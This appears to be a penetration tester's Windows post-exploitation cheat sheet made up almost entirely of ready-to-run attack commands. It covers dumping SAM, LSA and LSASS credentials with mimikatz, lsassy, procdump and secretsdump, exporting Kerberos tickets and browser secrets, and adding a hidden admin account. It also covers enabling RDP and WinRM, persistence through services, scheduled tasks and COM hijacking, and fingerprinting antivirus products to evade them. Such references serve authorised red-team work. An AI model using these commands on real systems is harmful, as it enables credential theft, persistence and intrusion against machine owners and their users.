Post-Ex Windows
Dump secrets
LSA
crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa
SAM
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam
reg save hklm\sam .\sam reg save hklm\system .\system reg save hklm\security .\security
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
LSASS
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy
lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>
./spraykatz.py -u <user> -p <password> -t <ip>
pypykatz lsa minidump lsass.dmp
procdump.exe --accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit
Kerberos
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Browser secrets
sharpchrome.exe
https://github.com/login-securite/DonPAPI
DonPAPI.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
Create/add new local admin account
net user add <user> <pass>
net localgroup "Administrators" <user> /add
Enable WinRM
Enable-PSRemoting -SkipNetworkProfileCheck -Force
Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
add user to RDP group
net localgroup "Remote Desktop Users" <user> /add
Create service
New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic
Start-Service syshell
sc \\127.0.0.1 create ServiceName binpath=C:\windows\system32\calc.exe
\192.168.1.2 is optional
To check if service working well, you can reboot like this:
wmic /node:192.168.1.2 os get buildnumber then
wmic /node:192.168.1.2 os where buildnumber="<Number>" call reboot
Execute binary using WMIC
wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"
/node is optional
Stop processus
Run this to get processid : sc \\127.0.0.1 query ServiceName
then : wmic /node:127.0.0.1 process where processid=<PID> call terminate
/node is optional
and then taskkill /S 127.0.0.1 /PID <PID> /f
/S is optional
Create Scheduled tasks
schtasks /create /S 192.156.1.2 /tn <name> /sc once /sd 01/01/1910 /ru system /tr “C:\windows\system32\calc.exe”
Other
schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30
ru
, and /S is optional To check if tasks has been created run this schtasks /s 192.156.1.2 /query /tn <name>
COM hijack
schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg
# Change to HKCU and change dll
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
Disconnect User
rwinsta /server:192.168.1.2 <sessionId>
to get sessionId please run this
qwinsta
detection of the anti virus (AV)
run fltmc to get list of altitude, and search it into windows documentation : https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes
for exemple 389040 = SentinelOne
AV range is : 320000 - 329998
It's also possible to get AV from process list
for exemple
Microsoft Defender MSMpEng.exe
Trend Micro TMBMSRV.exe
Avira avguard.exe/Avira.ServiceHost.exe
Bitdefender bdagent.exe/vsserv.exe
Kaspersky avp.exe/ksde.exe
AVG AVGSvc.exe
Norton NortonSecurity.exe
McAfee MCAPExe.exe/mfemms.exe
Panda PavPrSvr.exe
Avast afwServ.exe/AvastSvc.exe